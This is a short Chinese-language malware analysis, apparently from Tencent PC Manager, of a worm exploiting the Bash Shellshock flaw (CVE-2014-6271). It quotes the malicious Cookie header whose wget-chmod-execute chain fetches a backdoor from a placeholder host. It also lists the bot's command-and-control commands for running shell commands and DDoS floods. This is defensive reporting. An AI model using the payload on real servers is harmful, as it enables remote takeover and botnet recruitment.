关于 ShellShock 蠕虫分析

2015-05-12 来源:未知 作者:腾讯电脑管家
【文章摘要】最近,BASH爆出一个远程代码执行漏洞:CVE-2014-6271。目前已发现利用这个漏洞的蠕虫木马,黑客通过利用bash漏洞攻击有漏洞的服务器,远程执行恶意代码指令,下载然后执行后门程序。

最近,BASH爆出 一个远程代码执行漏洞:CVE-2014-6271。目前已发现利用这个漏洞的蠕虫木马,黑客通过利用bash漏洞攻击有漏洞的服务器,远程执行恶意代码 指令,下载然后执行后门程序。 目前,腾讯电脑管家等Windows安全产品已经发现并查杀恶意利用“破壳”漏洞的木马。

向服务器发送恶意构造的HTTP请求

Cookie, ().{.:;.};.wget /tmp/besh https://x.x.x.x/nginx; chmod.777 /tmp/besh; /tmp/besh;

由于bash漏洞,造成服务器执行如下指令

wget /tmp/besh https://x.x.x.x/nginx; chmod.777 /tmp/besh; /tmp/besh;

攻击流程示意图



 

PAYLOAD : Linux backdoor 分析

该文件是一个linux的后门BOT程序,会连接远程C&C Server 接收命令,执行sh指令,进行DDos攻击等。

控制命令列表:

! PING-PONG:类似心跳的请求响应

! GETLOCALIP:获取本地IP

! SH: 执行sh命令

! SCANNER ON | OFF:扫描启动,关闭

! HOLD:HOLD Flooding

! JUNK:  JUNK Flooding

! UDP:  UDP Flooding

! TCP:  TCP Flooding

! KILLATTK: 结束攻击任务

! LOLNOGTFO:结束后门程序

 

电脑管家 V16

全新上线 更轻更快